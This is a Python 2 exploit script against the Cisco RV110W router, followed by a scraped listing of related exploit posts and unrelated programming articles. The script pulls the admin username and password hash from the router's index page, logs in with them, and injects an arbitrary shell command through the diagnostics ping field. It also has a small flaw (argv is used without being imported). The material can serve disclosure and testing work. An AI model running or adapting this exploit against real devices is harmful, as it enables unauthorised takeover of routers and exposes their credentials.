#!/usr/bin/env python2

#####

## Cisco RV110W Password Disclosure and OS Command Execute.

### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

# Date: 2018-08

# Exploit Author: RySh

# Vendor Homepage: https://www.cisco.com/

# Version: 1.1.0.9

# Tested on: RV110W 1.1.0.9

# CVE : CVE-2014-0683, CVE-2015-6396

import os

import sys

import re

import urllib

import urllib2

import getopt

import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###

# Usage: ./{script_name} 192.168.1.1 443 "reboot"

###

if __name__ == "__main__":

    IP = argv[1]

    PORT = argv[2]

    CMD = argv[3]

    # Get session key, Just access index page.

    url = 'https://' + IP + ':' + PORT + '/'

    req = urllib2.Request(url)

    result = urllib2.urlopen(req)

    res = result.read()

    # parse 'admin_pwd'! -- Get credits

    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]

    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]

    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

    # Get session_id by POST

    req2 = urllib2.Request(url + "login.cgi")

    req2.add_header('Origin', url)

    req2.add_header('Upgrade-Insecure-Requests', 1)

    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req2.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req2.add_header('Referer', url)

    req2.add_header('Accept-Encoding', 'gzip, deflate')

    req2.add_header('Accept-Language', 'en-US,en;q=0.9')

    req2.add_header('Cookie', 'SessionID=')

    data = {"submit_button": "login",

            "submit_type": "",

            "gui_action": "",

            "wait_time": "",

            "change_action": "",

            "enc": "",

            "user": admin_user,

            "pwd": admin_pwd,

            "sel_lang": "EN"

            }

    r = urllib2.urlopen(req2, urllib.urlencode(data))

    resp = r.read()

    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]

    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

    # Execute your commands via diagnose command parameter, default command is `reboot`

    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)

    req3.add_header('Origin', url)

    req3.add_header('Upgrade-Insecure-Requests', 1)

    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req3.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req3.add_header('Referer', url)

    req3.add_header('Accept-Encoding', 'gzip, deflate')

    req3.add_header('Accept-Language', 'en-US,en;q=0.9')

    req3.add_header('Cookie', 'SessionID=')

    data_cmd = {"submit_button": "Diagnostics",

            "change_action": "gozila_cgi",

            "submit_type": "start_ping",

            "gui_action": "",

            "traceroute_ip": "",

            "commit": "",

            "ping_times": "3 |" + CMD + "|",

            "ping_size": "",

            "wait_time": "",

            "ping_ip": "127.0.0.1",

            "lookup_name": ""

            }

    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

[EXP]Cisco RV110W - Password Disclosure / Command Execution的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

  7. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  8. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  9. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

随机推荐

  1. mysql case when then else end 写法

    今天改SQL用到了就搜了搜,现在记下来. case when tableName.type in (1,2,3,4) and tableName.state  in (5,6) then 1 when ...

  2. Python中import, from...import,import...as的区别

    import datetime print(datetime.datetime.now()) 以上代码实现输出系统当前时间,是引入整个datetime包,然后再调用datetime这个类中的now() ...

  3. Mark,20180127,技术博客之路开启!

    不怎么会说话,自己本身少说话的撸码loner,少说多做.毕业从事手游一年多,之前主要从事Cocos2dx,刚转投Unity不到一个月,后面主要总结下自己在这两方面开发过程中的一些历程,希望自己能有所积 ...

  4. [leetcode]297. Serialize and Deserialize Binary Tree 序列化与反序列化二叉树

    Serialization is the process of converting a data structure or object into a sequence of bits so tha ...

  5. hdpi对应分辨率

    ldpi  QVGA (240×320) mdpi  HVGA (320×480) hdpi  WVGA (480×800),FWVGA (480×854) xhdpi  720P(1280*720) ...

  6. 一个JAVA程序员经常访问的网站

    综合技术网站: CSDN            http://www.csdn.net/ 51CTO             http://www.51cto.com/ 开源中国社区   http:/ ...

  7. Quartz.Net进阶之三:SimpleTrigger详述

    以前都是将所有的内容放在一篇文章里,就会导致文章很长,对于学习的人来说,有时候这也是一个障碍.所以,以后我的写作习惯,我就会把我写的文章缩短,但是内容不会少,内容更集中.这样,学习起来也不会很累,很容 ...

  8. shell脚本编写informix数据库中表的导入和导出

    表的导入: 第一行:是指此脚本使用/bin/bash来解释执行. 第四行:定义一个list,里面存放表的名称,之间用空格隔开. 第七行:dbaccess tofpe(数据库名) <<EOF ...

  9. db2实现递归调用 机构等树形数据结构形成

    WITH n(lev,ID, NAME, PORGID, ORG_ID_TREE) AS (SELECT 0,ID, NAME, PORGID, CAST(ID AS VARCHAR(1024)) F ...

  10. 网络传输 buf 封装 示例代码

    网络传输 buf 封装 示例代码 使用boost库 asio // BufferWrapTest.cpp : 定义控制台应用程序的入口点. // #include "stdafx.h&quo ...